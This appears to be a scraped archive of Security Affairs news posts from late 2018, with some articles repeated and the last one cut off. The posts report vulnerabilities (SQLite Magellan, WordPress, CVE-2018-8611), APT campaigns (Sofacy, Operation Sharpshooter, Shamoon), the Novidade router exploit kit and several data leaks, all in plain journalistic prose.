Category Archives: Breaking News

Magellan RCE flaw in SQLite potentially affects billions of apps

Security experts at Tencent’s Blade security team discovered the Magellan RCE flaw in SQLite database software that exposes billions of vulnerable apps.

Security experts at Tencent’s Blade security team have discovered a critical vulnerability in SQLite database software that exposes billions of vulnerable apps to hackers.

The vulnerability tracked as ‘Magellan‘ could allow remote attackers to execute arbitrary on vulnerable devices, leak program memory or cause dos condition with application crash.

“Magellan is a remote code execution vulnerability discovered by Tencent Blade Team that exists in SQLite. As a well-known database, SQLite is widely used in all modern mainstream operating systems and software, so this vulnerability has a wide range of influence. ” reads a blog post published by the Tencent Blade Team.

SQLite is a widely adopted relational database management system contained in a C programming library. Unlike many other database management systems, SQLite is not a client–server database engine. Rather, it is embedded into the end program.

SQLite is used by millions of applications with billions of installs, Magellan potentially affects IoT devices, macOS and Windows apps.

Experts also tested Chromium and discovered it was affected too, Google has confirmed and fixed this issue.

Chromium-based web browser such as Google Chrome, Opera, Vivaldi, and Brave also support SQLite through the deprecated Web SQL database API.

Experts warn that a remote attacker can easily target people using vulnerable browsers by tricking them visiting a specially crafted web-page.

“After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability. We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible.” continues the post.

SQLite version 3.26.0 addresses the Magellan flaw, Google released Chromium version 71.0.3578.80 to fix the issue and rolled out the patched version to the latest version of Google Chrome and Brave web-browsers.

The Tencent experts said they successfully build a proof-of-concept exploit using the Magellan flaw that worked against Google Home.

Experts did not disclose the exploit to allow development teams to address flawed applications. The good news is that experts have not seen attacks abusing the Magellan flaw yet.

Users and administrators have to update their systems and vulnerable applications as soon as possible.

Pierluigi Paganini

(Security Affairs –Magellan flaw, hacking)

The post Magellan RCE flaw in SQLite potentially affects billions of apps appeared first on Security Affairs.

A bug in Facebook Photo API exposed photos of 6.8 Million users

New problems for Facebook, the social network giant announced that a bug related to Photo API could have allowed third-party apps to access users’ photos.

Facebook announced that photos of 6.8 Million users might have been exposed by a bug in the Photo API allowing third-party apps to access them.  
The bug impacted up over 870 developers, only apps granted access to photos by the user could have exploited the bug. 
According to Facebook, the flaw exposed user photos for 12 days, between September 13 and September 25, 2018.

The flaw was discovered by the Facebook internal team and impacted users who had utilized Facebook Login and allowed third-party apps to access their photos.

“Our internal team discovered a photo API bug that may have affected people who used Facebook Login and granted permission to third-party apps to access their photos. We have fixed the issue but, because of this bug, some third-party apps may have had access to a broader set of photos than usual for 12 days between September 13 to September 25, 2018.” reads a post published by Facebook.

Theoretically, applications that are granted access to photos could access only images shared on a user’s timeline. The bug could have exposed also other photos, including ones shared on Facebook Marketplace or via Stories, and even photos that were only uploaded but not posted.

“Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos.” continues the post.

Facebook is notifying impacted people via an alert in their account.

“We’re sorry this happened. Early next week we will be rolling out tools for app developers that will allow them to determine which people using their app might be impacted by this bug. We will be working with those developers to delete the photos from impacted users.” concludes Facebook.

“We will also notify the people potentially impacted by this bug via an alert on Facebook. The notification will direct them to a Help Center link where they’ll be able to see if they’ve used any apps that were affected by the bug.”

Pierluigi Paganini

(Security Affairs –Facebook, privacy)

The post A bug in Facebook Photo API exposed photos of 6.8 Million users appeared first on Security Affairs.

WordPress version 5.0.1 addressed several vulnerabilities

This week, the WordPress development team released on Thursday the version 5.0.1 of the popular CMS, that addresses several flaws.

The Researcher Tim Coen discovered several cross-site scripting (XSS) vulnerabilities in the CMS. One of the flaws is caused by the ability of contributors to edit new comments from users with higher privileges.
Coen also discovered that it is possible to trigger XSS flaws by using  specially crafted URL input against some plugins.

Coen along with the researcher Slavco Mihajloski discovered an XSS vulnerability that allows authors on websites running on Apache servers to upload specially crafted files that bypass the MIME verification.

“Prior to 5.0.1, WordPress did not require uploaded files to pass MIME type verification, so files could be uploaded even if the contents didn’t match the file extension. For example, a binary file could be uploaded with a .jpg extension,” wrote WordPress developer Ian Dunn. “This is no longer the case, and the content of uploaded files must now match their extension. Most valid files should be unaffected, but there may be cases when a file needs to be renamed to its correct extension (e.g., an OpenOffice doc going from .pptx to .ppxs).”

Another flaw discovered by experts at Yoast affects some uncommon configurations and causes the user activation screen being indexed by search engines. This could lead the exposure of email addresses and some default passwords in “some rare cases.”

Karim El Ouerghemmi discovered that security issues allows authors to alter metadata and delete files that they normally would not be authorized to delete.

Security expert Sam Thomas discovered that contributors could use specially crafted metadata for PHP object injection.

The last flaw was discovered by Simon Scannell from RIPS Technologies, il could be exploited by authors using specially crafted input to create posts of unauthorized types.

Security updates that addressed the above flaws have been released for WordPress 4.9 and older releases. Version 5.0 already includes the fixes.

Pierluigi Paganini

(Security Affairs –WordPress, security)

The post WordPress version 5.0.1 addressed several vulnerabilities appeared first on Security Affairs.

Security Affairs: WordPress version 5.0.1 addressed several vulnerabilities

This week, the WordPress development team released on Thursday the version 5.0.1 of the popular CMS, that addresses several flaws.

The Researcher Tim Coen discovered several cross-site scripting (XSS) vulnerabilities in the CMS. One of the flaws is caused by the ability of contributors to edit new comments from users with higher privileges.
Coen also discovered that it is possible to trigger XSS flaws by using  specially crafted URL input against some plugins.

Coen along with the researcher Slavco Mihajloski discovered an XSS vulnerability that allows authors on websites running on Apache servers to upload specially crafted files that bypass the MIME verification.

“Prior to 5.0.1, WordPress did not require uploaded files to pass MIME type verification, so files could be uploaded even if the contents didn’t match the file extension. For example, a binary file could be uploaded with a .jpg extension,” wrote WordPress developer Ian Dunn. “This is no longer the case, and the content of uploaded files must now match their extension. Most valid files should be unaffected, but there may be cases when a file needs to be renamed to its correct extension (e.g., an OpenOffice doc going from .pptx to .ppxs).”

Another flaw discovered by experts at Yoast affects some uncommon configurations and causes the user activation screen being indexed by search engines. This could lead the exposure of email addresses and some default passwords in “some rare cases.”

Karim El Ouerghemmi discovered that security issues allows authors to alter metadata and delete files that they normally would not be authorized to delete.

Security expert Sam Thomas discovered that contributors could use specially crafted metadata for PHP object injection.

The last flaw was discovered by Simon Scannell from RIPS Technologies, il could be exploited by authors using specially crafted input to create posts of unauthorized types.

Security updates that addressed the above flaws have been released for WordPress 4.9 and older releases. Version 5.0 already includes the fixes.

Pierluigi Paganini

(Security Affairs –WordPress, security)

The post WordPress version 5.0.1 addressed several vulnerabilities appeared first on Security Affairs.



Security Affairs

Security Affairs: New Sofacy campaign aims at Government agencies across the world

Security experts at Palo Alto Networks uncovered a new espionage campaign carried out by Russia-Linked APT group Sofacy.

Russian Cyber espionage group Sofacy (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium)) carried out a new cyber campaign aimed at government agencies in four continents in an attempt to infect them with malware.

The campaign has been focusing on Ukraine and NATO members like it has done in past attacks.

Earlier December the group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU). In November experts at Palo Alto Networks documents a new malware, dubbed Cannon in attacks on government entities worlwide.

The latest campaign documented by Palo Alto Networks was carried out from mid-October through mid-November, attackers used both the
Zebrocy backdoor and Cannon Trojan. 

Researchers noticed that in all the attacks threat actors used decoy documents that have the same author name Joohn.

“The delivery documents used in the October and November waves shared a large number of similarities, which allowed us to cluster the activity together. Most notably, the author name Joohn was used repeatedly in each delivery document.” reads the analysis published by Palo Alto Networks.

“There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field.”

Palo Alto Networks identified a total of 9 documents and associated payloads and targets.

Once opened a document, it will leverage the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document.

“If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session.” continues the report.

“The victim will then see a prompt to Enable Content as with any malicious macro document. If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded”

Sofacy bait

The latest Sofacy campaign hit targets around the world, including a foreign affairs organization in North America, foreign affairs organizations in Europe, as well as government entities in former USSR states. Experts also discovered evidence of possible targeting of local law enforcement agencies worldwide (i.e. North America, Australia, and Europe.) 

Palo Alto Networks reveals that, in addition to the delivery documents themselves, the remote templates too shared a common author name. The security researchers also noticed that the servers hosting the remote templates also hosted the C&C for the first-stage payloads.

Sofacy attackers used different variants of the Zebrocy malware and the Cannon backdoor. Palo Alto Networks identified a Cannon variant written in Delphi, variants of Zebrocy written in C# and VB.NET.

“The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques.” concludes the analysis.

“The group clearly shows a preference for using a simple downloader like Zebrocy as first-stage payloads in these attacks. The group continues to develop new variations of Zebrocy by adding a VB.NET and C# version, and it appears that they also have used different variants of the Cannon tool in past attack campaigns,” 

Pierluigi Paganini

(Security Affairs –Sofacy, cyber espionage)

The post New Sofacy campaign aims at Government agencies across the world appeared first on Security Affairs.



Security Affairs

New Sofacy campaign aims at Government agencies across the world

Security experts at Palo Alto Networks uncovered a new espionage campaign carried out by Russia-Linked APT group Sofacy.

Russian Cyber espionage group Sofacy (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium)) carried out a new cyber campaign aimed at government agencies in four continents in an attempt to infect them with malware.

The campaign has been focusing on Ukraine and NATO members like it has done in past attacks.

Earlier December the group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU). In November experts at Palo Alto Networks documents a new malware, dubbed Cannon in attacks on government entities worlwide.

The latest campaign documented by Palo Alto Networks was carried out from mid-October through mid-November, attackers used both the
Zebrocy backdoor and Cannon Trojan. 

Researchers noticed that in all the attacks threat actors used decoy documents that have the same author name Joohn.

“The delivery documents used in the October and November waves shared a large number of similarities, which allowed us to cluster the activity together. Most notably, the author name Joohn was used repeatedly in each delivery document.” reads the analysis published by Palo Alto Networks.

“There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field.”

Palo Alto Networks identified a total of 9 documents and associated payloads and targets.

Once opened a document, it will leverage the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document.

“If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session.” continues the report.

“The victim will then see a prompt to Enable Content as with any malicious macro document. If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded”

Sofacy bait

The latest Sofacy campaign hit targets around the world, including a foreign affairs organization in North America, foreign affairs organizations in Europe, as well as government entities in former USSR states. Experts also discovered evidence of possible targeting of local law enforcement agencies worldwide (i.e. North America, Australia, and Europe.) 

Palo Alto Networks reveals that, in addition to the delivery documents themselves, the remote templates too shared a common author name. The security researchers also noticed that the servers hosting the remote templates also hosted the C&C for the first-stage payloads.

Sofacy attackers used different variants of the Zebrocy malware and the Cannon backdoor. Palo Alto Networks identified a Cannon variant written in Delphi, variants of Zebrocy written in C# and VB.NET.

“The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques.” concludes the analysis.

“The group clearly shows a preference for using a simple downloader like Zebrocy as first-stage payloads in these attacks. The group continues to develop new variations of Zebrocy by adding a VB.NET and C# version, and it appears that they also have used different variants of the Cannon tool in past attack campaigns,” 

Pierluigi Paganini

(Security Affairs –Sofacy, cyber espionage)

The post New Sofacy campaign aims at Government agencies across the world appeared first on Security Affairs.

French foreign ministry announced its Travel Alert Registry Hack

The French foreign ministry announced today that its travel alert registry website had been hacked and personal data of citizens “could be misused”.

The French foreign ministry confirmed tha hackers breached into
the Ariane system, its travel alert registry website, and personal data of citizens “could be misused”.

The Ariane system provides security alerts to registered users when traveling abroad. At the time there aren’t technical details about the intrusion or the number of affected people.

“Users reported receiving emails notifying them that their names, cellphone numbers and email addresses may have been stolen, but the ministry said none of the data was “sensitive” or “of a financial nature”.” reported the AFP press.

statement did not indicate who might be behind the attack.

The ministry started notifying the incident to the affected users, it also informed media to have taken necessary measures to avoid similar incidents in the future.

“We immediately took the necessary measures to ensure this type of incident would not happen again,” it said.

The Ministry confirmed that the site was now secured.

Pierluigi Paganini

(Security Affairs –Travel Alert Registry, hacking)

The post French foreign ministry announced its Travel Alert Registry Hack appeared first on Security Affairs.

Operation Sharpshooter targets critical infrastructure and global defense

McAfee uncovered a campaign tracked as Operation Sharpshooter that hit at least 87 organizations in global defense and critical infrastructure.

Security experts at McAfee uncovered a hacking campaign, tracked as Operation Sharpshooter, aimed at infrastructure companies worldwide. The threat actors are using malware associated with Lazarus APT group that carried out Sony Pictures attack back in 2014.

The current campaign os targeting nuclear, defense, energy, and financial companies, experts believe attackers are gather intelligence to prepare future attacks.

“In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis.” reads the analysis published by McAfee.

“Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest.”

Operation Sharpshooter

Threat actors are carrying out spear phishing attacks with a link poining to weaponized Word documents purporting to be sent by a job recruiter. The messages are in English and include descriptions for jobs at unknown companies, URLs associated with the documents belongs to a US-based IP address and to the Dropbox service.

The macros included in the malicious document uses an embedded shellcode to inject the Sharpshooter downloader into Word’s memory.

The macros act as a downloader for a second-stage implant dubbed Rising Sun that runs in memory and collects intelligence about the machine (network adapter information, computer name, username, IP address information, OS information, drive and process information, and other native system data). 
The Rising Sun implements tens of backdoor capabilities, including the abilities to terminate processes and write files to disk.

The binary is downloaded in the startup folder to gain persistence on the infected system. Experts observed that attackers behind the Operation Sharpshooter also downloads a second harmless Word document from the control server, most likely as a decoy to hide the malware.

The malware sends collected data to the C2 in an encrypted format, it uses the RC4 algorithm and encodes the encrypted data with Base64.

The control infrastructure is composed of servers located in the US, Singapore, and France.

Experts highlighted that the Rising Sun uses source code from Trojan Duuzer, a backdoor used by Lazarus Group in Sony attacks.

“This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.” continues the report.

Experts found other similarities, for example the documents that are being used to distribute Rising Sun contain metadata indicating they were created using a Korean-language version of Word.

Experts found many similarities between the malware used in the 
Operation Sharpshooter and the one used in the Sony hack, experts also found similarities in tactics, techniques, and procedures used by the attackers and the Lazarus Group.

Experts believe that threat actors behind Operation Sharpshooter are planting false flags to make attribution more difficult.

Further details on the campaign, including IoCs are reported in the analysis published by McAfee.

Pierluigi Paganini

(Security Affairs – Operation Sharpshooter, hacking)



The post Operation Sharpshooter targets critical infrastructure and global defense appeared first on Security Affairs.

ID Numbers for 120 Million Brazilians taxpayers exposed online

InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers for 120 million Brazilian taxpayers

In March 2018, security experts at InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers, or Cadastro de Pessoas Físicas (CPFs), for 120 million Brazilian nationals. It is not clear how long data remained exposed online or who accessed them.

Every Brazilian national has assigned a taxpayer identification number that allows him to perform ordinary operations, such as opening a bank account, paying taxes, or getting a loan.

Experts discovered the file index.html_bkp on the Apache server (likely a backup of the index.html), which caused the web server to display the list of the files and folder stored in that folder and download them.

The folder included data archives ranging in size from 27 megabytes to 82 gigabytes.

Experts at InfoArmor discovered that one of the archive contained data related to Cadastro de Pessoas Físicas (CPFs), personal information, military info, telephone, loans, and addresses. 

“CPFsare an identification number issued by the Brazilian Federal Reserve to Brazilian citizens and tax-paying residentaliens, and each exposed CFP linked to an individual’s banks, loans, repayments, credit and debit history, voting history, full name, emails, residential addresses, phone numbers, date of birth, family contacts, employment, voting registration numbers, contract numbers, and contract amounts.” reads the report published by InfoArmor.

Brazilian taxpayer directory-listing-red 2.jpg


Experts believe that directory was used to store database backups. While InfoArmor was attempting to report the discovery to owner of the database, someone replaced the 82 GB file a raw 25 GB .sql file.

In the days following the initial discovery, InfoArmor’s research team attempted to determine who owned the server so they could be notified. During this time, InfoArmor observed that one of the files, an 82 GB file, had been replaced by a raw .sql file 25 GB in size, though its filename remained the same.” continues the report.

“This swap suggests a human intervened. It is possible that a server administrator had discovered the leak, however the server remained unsecured for weeks after this swap”

InfoArmor was any way able to contact the hosting provider that secured the directory by the end of March.

A question remains without response, why this kind of data was exposed a third-party server.

“It is safe to assume that any intelligence organization or cybercrime group with reasonable collection capabilitiesand expertise will have captured this data. This data could very likely be used against the population of Brazil, thenation of Brazil, or any nations hosting people who have a CFP.” concludes InfoArmor.

Pierluigi Paganini

(Security Affairs – Brazilian Taxpayers, data leak)

The post ID Numbers for 120 Million Brazilians taxpayers exposed online appeared first on Security Affairs.

A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack

A new variant of the Shamoon malware, aka DistTrack, was uploaded to VirusTotal from Italy this week, but experts haven’t linked it to a specific attack yet.

Shamoon was first observed in 2012 when it infected and wiped more than 30,000 systems at Saudi Aramco and other oil companies in the Middle East.

Four years later, a new version (Shamoon 2) appeared in the threat landscape, it was involved in a string of cyber attacks aimed at various organizations in the Persian Gulf, including Saudi Arabia’s General Authority of Civil Aviation (GACA). 

A second variant of the same threat was discovered by researchers at Palo Alto Networks in January 2017 and it was able to target virtualization products.

DistTrack is able to wipe data from hard drives of the infected systems and render systems unusable. Like other malware, Shamoon leverages Windows Server Message Block (SMB) to spread among systems of the target network.

The code of the original Shamoon includes a list of hard-coded domain credentials used to the target a specific organization and steal credentials, but a variant uploaded to VirusTotal this week doesn’t contain these credentials.

Google security firm Chronicle discovered a file containing Shamoon uploaded to its VirusTotal database.

“The new Shamoon was set to detonate on Dec. 7, 2017, at 11:51 pm, but only uploaded yesterday.reported  Axios website.

“Chronicle notes that attackers may have set the attack date to the past — perhaps by changing 2018 to 2017 — in order to start an attack immediately. Another possibility, said Brandon Levene, head of applied intelligence at Chronicle, is that the malware was compiled in the past as part of preparations for a later attack.”

Unlike the Shamoon2, the new version contains a much longer filename list used for selecting a dropped executable name. The new list does not overlap with previously observed versions of Shamoon.

The new variant presents other anomalies, for example, the list of the command and control server was blank. Experts at Chronicle believe that attackers may have a different connection to the host network and manually install Shamoon.

Another difference is that Shamoon in the past has replaced all files with images that had political significance. The latest variant irreversibly encrypts the files.

The file was uploaded on VirusTotal from Italy and malicious files were discovered at around the time Italian oil services company Saipem announced to have suffered a cyber attack.

“While Chronicle cannot directly link the new Shamoon variant to an active attack, the timing of the malware files comes close to news of an attack on an Italian energy corporation with assets in the Middle East.” 
Chronicle noted in a statement.

Pierluigi Paganini

(Security Affairs – Wiper, malware)

The post A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack appeared first on Security Affairs.

Cyber attack hit the Italian oil and gas services company Saipem

Some of the servers of the Italian oil and gas services company Saipem were hit by a cyber attack early this week.

 Saipem has customers in more than 60 countries, including Saudi Arabian oil and gas giant Saudi Aramco. It could be considered a strategic target for a broad range of threat actors.

The attack has been identified out of India on Monday and primarily affected the servers in the Middle East, including Saudi Arabia, the United Arab Emirates, and Kuwait.

Main operating centers in Italy, France and Britain had not been affected.

The attack affected only a limited number of servers in its infrastructure, Saipem said it is working to restore them using backups, a circumstance that could suggest that a ransomware hit the company.

Saipem told Reuters the attack originated in Chennai, India, but the identity of the attackers is unknown.

“The servers involved have been shut down for the time being to assess the scale of the attack,”Saipem’s head of digital and innovation, Mauro Piasere, told Reuters. 

“There has been no loss of data because all our systems have back-ups,” he added.

Saipem

The Italian oil services company Saipem was hit by a cyber attack, it confirmed the event but has shared a few details about the attack.

“We have no proof of the origins or reasons for the attack, though this is being investigated,” a Saipem spokesperson said via email.

“We are collecting all the elements useful for assessing the impact on our infrastructures and the actions to be taken to restore normal activities,” the firm said in a statement.

At the time it is impossible to attribute the attack, it is not clear is the company faced a targeted attack or if was hit in a broader campaign carried out by threat actors.

We cannot exclude that attackers hit the company to target its business partners too, for example, Saudi Aramco that suffered Shamoon attacks in 2012 and 2016.

Saipem told media it was reporting the incident to the competent authorities.

Pierluigi Paganini

(Security Affairs – energy industry, cyber attack)

The post Cyber attack hit the Italian oil and gas services company Saipem appeared first on Security Affairs.

New threat actor SandCat exploited recently patched CVE-2018-8611 0day

Experts from Kaspersky Lab reported that that the recently patched Windows kernel zero-day vulnerability (CVE-2018-8611) has been exploited by several threat actors.

Microsoft’s Patch Tuesday updates for December 2018 address nearly 40 flaws, including a zero-day vulnerability affecting the Windows kernel.

The flaw, tracked as CVE-2018-8611, is as a privilege escalation flaw caused by the failure of the Windows kernel to properly handle objects in memory.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.” reads the security advisory published by Microsoft.

“An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.”

The vulnerability was reported to Microsoft by researchers at Kaspersky Lab. Kudos to Kaspersky experts that in the last months reported other two Windows zero-days, CVE-2018-8453 and CVE-2018-8589, respectively exploited by FruityArmor and multiple threat actors in attacks mostly aimed at the Middle East.

according to Kaspersky, the CVE-2018-8611 is a race condition that resides in the Kernel Transaction Manager, and most interesting, it could be used to escape the sandbox of the Chrome and Edge web browsers.

“CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.” reads the analysis published by Kaspersky.

“This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.”

Kaspersky has found several builds of the CVE-2018-8611 exploit, including one adapted for the latest versions of Windows.

The flaw was exploited by known threat actors and a recently discovered group tracked as SandCat that appears to be active in the Middle East.

SandCat was also using the FinFisher/FinSpy spyware and the CHAINSHOT malware,

According to Kaspersky, SandCat exploited the CVE-2018-8611 flaw in attacks aimed at entities in the Middle East and Africa. 

Pierluigi Paganini

(Security Affairs –SANDCAT, CVE-2018-8611)

The post New threat actor SandCat exploited recently patched CVE-2018-8611 0day appeared first on Security Affairs.

Novidade, a new Exploit Kit is targeting SOHO Routers

Security experts at Trend Micro have discovered a new exploit kit, dubbed Novidade (“novelty” in Portuguese), that is targeting SOHO routers to compromise the devices connected to the network equipment.

The Novidade exploit kit leverages cross-site request forgery (CSRF) to change the Domain Name System (DNS) settings of SOHO routers and redirect traffic from the connected devices to the IP address under the control of the attackers.

Since its first discovery in August 2017, experts observed three variants of the exploit kit, including one involved in the DNSChanger system of a recent GhostDNS campaign.

Currently, Novidade is used in different campaigns, experts believe it has been sold to multiple threat actors or its source code leaked.

Most of the campaigns discovered by the researchers leverages phishing attacks to retrieve banking credentials in Brazil. Experts also observed campaigns with no specific target geolocation, a circumstance that suggests attackers are expanding their target areas or a larger number of threat actors are using the exploit kit. 

“We found Novidade being delivered through a variety of methods that include malvertising, compromised website injection, and via instant messengers.” reads the analysis published by Trend Micro.

Novidade eK

Experts noticed that the landing page performs HTTP requests generated by JavaScript Image function to a predefined list of local IP addresses that are used by routers. Once established a connection, the Novidade toolkit queries the IP address to download an exploit payload encoded in base64.

The exploit kit blindly attacks the detected IP address with all its exploits. 

The malicious code also attempts to log into the router with a set of default credentials and then executes a CSRF attack to change the DNS settings.

“Once the router is compromised, all devices connected to it are vulnerable to additional pharming attacks.” continues the analysis.

All the variants of Novidade exploit kit observed by Trend Micro share the same attack chain, but the latest version improves the code on the landing page and adds a new method of retrieving the victim’s local IP address. 

Below the list of possible affected router models based on Trend Micro comparisons of the malicious code, network traffic, and published PoC code. 

  • A-Link WL54AP3 / WL54AP2 (CVE-2008-6823)
  • D-Link DSL-2740R
  • D-Link DIR 905L
  • Medialink MWN-WAPR300 (CVE-2015-5996)
  • Motorola SBG6580
  • Realtron
  • Roteador GWR-120
  • Secutech RiS-11/RiS-22/RiS-33 (CVE-2018-10080)
  • TP-Link TL-WR340G / TL-WR340GD
  • TP-Link WR1043ND V1 (CVE-2013-2645)

Novidade was used mostly to target Brazilian users, the largest campaign has delivered the exploit kit 24 million times since March. 

In September and October, the Novidade was delivered through notifications on instant messengers regarding the 2018 Brazil presidential election, and leveraging compromised websites injected with an iframe to redirect users to Novidade. The latter attack hit websites worldwide.

Trend Micro recommends to keep devices’ firmware up to date, change the default usernames and passwords on their routers, and also change the router’s default IP address. If not needed, disabling remote access is also recommended, as well as using secure web connections (HTTPS) to access sensitive websites to prevent pharming attacks.

Pierluigi Paganini

(Security Affairs – Novidade exploit kit, hacking)

The post Novidade, a new Exploit Kit is targeting SOHO Routers appeared first on Security Affairs.

Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.

Security Affairs: Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

